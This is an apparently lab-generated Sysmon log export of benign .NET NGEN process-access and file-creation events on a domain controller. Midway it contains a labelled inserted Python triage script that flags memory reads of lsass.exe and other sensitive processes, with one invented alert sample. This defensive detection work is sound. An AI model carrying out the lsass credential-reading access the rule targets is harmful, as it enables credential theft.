23542300x800000000000000023474Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.076{4DB9351A-A27F-60D3-BB05-00000000CF01}5160NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\5XCNLRDOU3\System.Activities.Presentation.ni.dllMD5=BC8A2FEB6832A7EF3D6CD134D149BDFA,SHA256=3E3AE996221DBF41820C5C455D89E0E841C84FB590DD2FF7304E3F4FFCA9FD69,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023516Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:13.748{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A281-60D3-C305-00000000CF01}2196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023515Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:13.733{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A281-60D3-C305-00000000CF01}2196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023514Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:13.733{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A281-60D3-C305-00000000CF01}2196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023513Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:13.717{4DB9351A-A281-60D3-C205-00000000CF01}6632NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\GAIG635A3R\System.Data.Linq.ni.dll.auxMD5=C2D0DF807B75CE9FEA7B0D276987B46D,SHA256=0FD4B095B389BAE6CF2236D8E73C66E62B4245FC1B96185A594D62780D8486EF,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023512Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:13.717{4DB9351A-A281-60D3-C205-00000000CF01}6632NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\GAIG635A3R\System.Data.Linq.ni.dllMD5=30B9A5BBECDEA0B00B789DD43479CAA5,SHA256=BC6FB58597C3035D6B406E78F6164FF0E1DA5D3CAB85B874F804CDD940210211,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023511Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:13.670{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA35D00F2C64E7048E2FE46B86C5CFC6,SHA256=1B2B34AC1EA1DA5F654C64B489C9EDD1402AD99D57BA03FE4F1EC0D0C718B442,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023510Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:13.545{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A281-60D3-C205-00000000CF01}6632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000023509Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:13.514{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A281-60D3-C205-00000000CF01}6632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023508Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:13.514{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A281-60D3-C205-00000000CF01}6632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023507Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:13.498{4DB9351A-A281-60D3-C105-00000000CF01}4356NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\QCK6JYLWOH\System.Data.Entity.Design.ni.dll.auxMD5=361DB13A3459FCA282724C485E237ADC,SHA256=B92E8A97C9B427B333CC19BBB7A1B494274C29999AEBA556DEF38A3DEBD004D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023506Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:13.498{4DB9351A-A281-60D3-C105-00000000CF01}4356NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\QCK6JYLWOH\System.Data.Entity.Design.ni.dllMD5=C815C0B5BC8A2F0D3F324987240BF59D,SHA256=BF90185F9A3DB0687C92D694BA2DF75E5FDD104E678C323A673B6BE64EF6C626,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023505Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:13.311{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A281-60D3-C105-00000000CF01}4356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
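Added example, not part of the exported dataset above: a triage routine for the Sysmon Event ID 10 (ProcessAccess) records in this export. The export has lost its field delimiters, so the parser splits the fused header with two Sysmon schema invariants (Level is always 4 and Task equals EventID) and then walks the body fields in schema order; SourceProcessId and SourceThreadId are fused with no separator and are kept as one token. It expects one record per line, so the wrapped records above would have to be rejoined before feeding them in. The three benign patterns it suppresses are the ones repeated throughout this section: ngen.exe driving mscorsvw.exe workers through mscorsvc.dll with PROCESS_ALL_ACCESS (0x1fffff), csrss.exe opening each newly created process from basesrv.dll, and svchost.exe (RPCSS) requesting only PROCESS_QUERY_LIMITED_INFORMATION (0x1000). The sample lines are constructed and modelled on the records above with abbreviated CallTraces; the updater.exe/lsass.exe line, its GUIDs and its record number are invented for the alert case. Access-right names come from winnt.h.

```python
"""Triage Sysmon Event ID 10 (ProcessAccess) records from the delimiter-less export above.
Added example, not part of the dataset. The header is split using two Sysmon schema
invariants (Level is always 4, Task equals EventID); body fields follow in schema order."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Process access rights from winnt.h (PROCESS_* plus the standard rights).
ACCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD", 0x0004: "PROCESS_SET_SESSIONID",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE", 0x0080: "PROCESS_CREATE_PROCESS", 0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION", 0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x2000: "PROCESS_SET_LIMITED_INFORMATION", 0x10000: "DELETE", 0x20000: "READ_CONTROL",
    0x40000: "WRITE_DAC", 0x80000: "WRITE_OWNER", 0x100000: "SYNCHRONIZE",
}
PROCESS_ALL_ACCESS = 0x1FFFFF
INTRUSIVE = 0x0002 | 0x0008 | 0x0010 | 0x0020   # rights that read or tamper with target memory
SENSITIVE_TARGETS = {"lsass.exe", "winlogon.exe", "csrss.exe"}

# Fused Event ID 10 layout: EventID Version Level Task Opcode Keywords RecordID Channel Computer
# RuleName UtcTime SourceProcessGUID SourceProcessId+SourceThreadId (fused, kept as one token)
# SourceImage TargetProcessGUID TargetProcessId TargetImage GrantedAccess CallTrace.
# GrantedAccess is matched lazily because its hex digits run straight into the "C:\" of CallTrace.
EVENT10_RE = re.compile(
    r"^10(?P<version>\d)410(?P<opcode>\d)(?P<keywords>0x[0-9A-Fa-f]{16})(?P<record>\d+)"
    r"Microsoft-Windows-Sysmon/Operational(?P<computer>\S+?)-"
    r"(?P<utc>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d{3})"
    r"\{(?P<src_guid>[0-9A-Fa-f-]+)\}(?P<src_pid_tid>\d+)(?P<src_image>[A-Za-z]:\\[^{]+)"
    r"\{(?P<tgt_guid>[0-9A-Fa-f-]+)\}(?P<tgt_pid>\d+)(?P<tgt_image>[A-Za-z]:\\.+?)"
    r"(?P<access>0x[0-9A-Fa-f]+?)(?=[A-Za-z]:\\|UNKNOWN|$)(?P<calltrace>.*)$"
)

@dataclass
class ProcessAccess:
    record: int
    utc: str
    source_image: str
    target_image: str
    granted_access: int
    call_trace: str

def parse_event10(line: str) -> Optional[ProcessAccess]:
    """Parse one fused record; returns None for anything that is not an Event ID 10 line."""
    m = EVENT10_RE.match(line.strip())
    if m is None:
        return None
    return ProcessAccess(int(m["record"]), m["utc"], m["src_image"], m["tgt_image"],
                         int(m["access"], 16), m["calltrace"])

def decode_access(mask: int) -> List[str]:
    """Expand a GrantedAccess mask into the winnt.h right names it contains."""
    names = [name for bit, name in ACCESS_RIGHTS.items() if mask & bit]
    return (["PROCESS_ALL_ACCESS"] if mask == PROCESS_ALL_ACCESS else []) + names

def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def is_known_benign(ev: ProcessAccess) -> bool:
    """Allow-list for the three high-volume patterns that fill the export above."""
    src, tgt, trace = _basename(ev.source_image), _basename(ev.target_image), ev.call_trace.lower()
    # .NET native image generation: ngen.exe drives mscorsvw.exe workers through mscorsvc.dll.
    if src == "ngen.exe" and tgt == "mscorsvw.exe" and "mscorsvc.dll" in trace:
        return True
    # csrss.exe opens every newly created process from basesrv.dll (session bookkeeping).
    if src == "csrss.exe" and "basesrv.dll" in trace:
        return True
    # RPCSS inside svchost.exe asks for PROCESS_QUERY_LIMITED_INFORMATION only.
    return src == "svchost.exe" and "rpcss.dll" in trace and ev.granted_access == 0x1000

def triage(ev: ProcessAccess) -> str:
    """Classify one ProcessAccess event as benign, info, review or alert."""
    if is_known_benign(ev):
        return "benign"
    intrusive = bool(ev.granted_access & INTRUSIVE)
    # Sysmon writes UNKNOWN(...) for call-stack frames not backed by a loaded module.
    suspicious = _basename(ev.target_image) in SENSITIVE_TARGETS or "UNKNOWN" in ev.call_trace
    if intrusive and suspicious:
        return "alert"
    return "review" if intrusive else "info"

def triage_lines(lines: List[str]) -> Dict[int, str]:
    """Map RecordID -> verdict for each Event ID 10 line; other event IDs are skipped."""
    verdicts = {}
    for line in lines:
        ev = parse_event10(line)
        if ev is not None:
            verdicts[ev.record] = triage(ev)
    return verdicts

# Constructed sample modelled on the records above, CallTraces abbreviated. The last line
# (updater.exe reading lsass.exe, record 99999, invented GUIDs) is made up for the alert case.
SAMPLE_LINES = [
    r"10341000x800000000000000023456Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.045"
    r"{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe"
    r"{4DB9351A-A27F-60D3-B805-00000000CF01}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000"
    r"C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126",
    r"10341000x800000000000000023455Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.030"
    r"{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe"
    r"{4DB9351A-A27F-60D3-B805-00000000CF01}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffff"
    r"C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645",
    r"10341000x800000000000000023454Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.030"
    r"{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"
    r"{4DB9351A-A27F-60D3-B805-00000000CF01}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffff"
    r"C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)",
    r"10341000x800000000000000099999Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:00.000"
    r"{4DB9351A-B000-60D3-0001-00000000CF01}50125016C:\Users\Public\updater.exe"
    r"{4DB9351A-9DDC-60D3-0A00-00000000CF01}652C:\Windows\system32\lsass.exe0x1010"
    r"C:\Windows\SYSTEM32\ntdll.dll+9d0b4|C:\Windows\System32\KERNELBASE.dll+2bd5e|UNKNOWN(0000020D4A3E1A2B)",
]

if __name__ == "__main__":
    for rec, verdict in triage_lines(SAMPLE_LINES).items():
        print(rec, verdict)
```

Running the block prints one verdict per record: the three NGEN/csrss/RPCSS records above come out as benign, and the constructed lsass.exe read with 0x1010 (PROCESS_VM_READ | PROCESS_QUERY_LIMITED_INFORMATION) from an unknown binary with an UNKNOWN call-stack frame comes out as alert. The allow-list deliberately keys on the CallTrace module as well as the image names, so a process merely named ngen.exe or csrss.exe does not get a free pass.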
10341000x800000000000000023504Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:13.295{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A281-60D3-C105-00000000CF01}4356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023503Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:13.280{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A281-60D3-C105-00000000CF01}4356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023502Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:13.280{4DB9351A-A280-60D3-C005-00000000CF01}6624NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\SJFZD3I28S\System.Data.Entity.ni.dll.auxMD5=ED59452242CDFD7AB43ADD13EC75B6DB,SHA256=B2F47FCC365F33254C50F73D7981E78401153C7BEA0AE0104DD48F363794CDCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023501Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:13.280{4DB9351A-A280-60D3-C005-00000000CF01}6624NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\SJFZD3I28S\System.Data.Entity.ni.dllMD5=8B4DFA12537B38A3CD5FE2D446F43D14,SHA256=46962BAF1F11C4506FA10A477C9636E92E91904C4FC98622FAD6CB38041CB8E1,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023544Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.873{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A282-60D3-C805-00000000CF01}640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000023543Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.858{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A282-60D3-C805-00000000CF01}640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023542Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.858{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A282-60D3-C805-00000000CF01}640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microso
ft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023541Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.858{4DB9351A-A282-60D3-C705-00000000CF01}5872NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\4PML9HRIKA\System.Data.Services.Design.ni.dll.auxMD5=6BC14D38EB457C02B476ABA8DFA5EBB4,SHA256=26F51B7EC450E562691C88530211C10EA77FB703B78B52BE5548CCD55A2B9F3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023540Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.858{4DB9351A-A282-60D3-C705-00000000CF01}5872NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\4PML9HRIKA\System.Data.Services.Design.ni.dllMD5=02142202568474F8BC8237F7352E2B64,SHA256=5829CD5904E1032D2F1E951AECA74F630F06A63E11D6E15A5A84DCBC8DF3A43A,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023539Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 